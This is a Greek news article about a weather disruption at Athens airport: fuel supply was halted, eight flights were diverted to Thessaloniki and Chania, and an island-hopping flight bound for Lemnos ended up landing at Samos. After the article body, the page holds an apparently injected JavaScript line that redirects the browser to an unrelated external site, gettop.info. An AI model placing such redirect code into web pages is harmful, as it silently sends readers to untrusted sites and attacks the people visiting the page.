Αναστάτωση λόγω κακοκαιρίας στο Ελ.Βενιζέλος: 8 πτήσεις για Αθήνα κατευθύνθηκαν σε Θεσσαλονίκη και Χανιά

0
14

Αναστάτωση προκλήθηκε στο αεροδρόμιο Ελευθέριος Βενιζέλος όταν για λόγους ασφαλείας, λόγω της κακοκαιρίας η τροφοδοσία καυσίμων διεκόπη από τις 20:20 μέχρι και τις 21:45.

Αυτό είχε ως αποτέλεσμα 8 πτήσεις, οι οποίες ήταν προγραμματισμένο να προσγειωθούν και να ανεφοδιαστούν στην Αθήνα να λάβουν εντολή να μεταβούν στα αεροδρόμια των Χανίων και της Θεσσαλονίκης.

Στο μεταξύ δύσκολες ώρες έζησαν κυρίως λόγω των άσχημων καιρικών συνθηκών 18 επιβάτες της πτήσης από την Μυτιλήνη με προορισμό την Λήμνο.

Ο λόγος για το γνωστό «τραινάκι» των νησιωτών του ανατολικού Αιγαίου. Πρόκειται για το αεροπλάνο που συνδέει την Ρόδο με την Σάμο, την Χίο, την Μυτιλήνη και τέλος την Λήμνο μετ’ επιστροφής.

Η οδύσσεια τους ξεκίνησε στις 12.50 από το αεροδρόμιο της Μύρινας, όπου παρά τις προσπάθειες του χειριστών του αεροπλάνου, η προσγείωση ήταν αδύνατη, οπότε το αεροπλάνο ξεκίνησε να επιστρέψει στη Μυτιλήνη.

Και στη, Μυτιλήνη, όμως, ήταν πλέον αδύνατη η προσγείωση, οπότε το αεροπλάνο αναγκάστηκε να κινηθεί προς τον επόμενο του σταθμό την Χίο, με τους επιβάτες προς Λήμνο.

Δεν κατάφερε όμως, να προσγειωθεί ούτε εκεί, οπότε το αεροπλάνο έχοντας συμπληρώσει πάνω από δυο ώρες πτήσης σε άσχημες καιρικές συνθήκες, κατάφερε τελικά να προσγειωθεί στην Σάμο.
Μόλις οι καιρικές συνθήκες το επιτρέψουν οι επιβάτες θα αναχωρήσουν για την Αθήνα και από εκεί θα μεταβούν στη Λήμνο.
setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here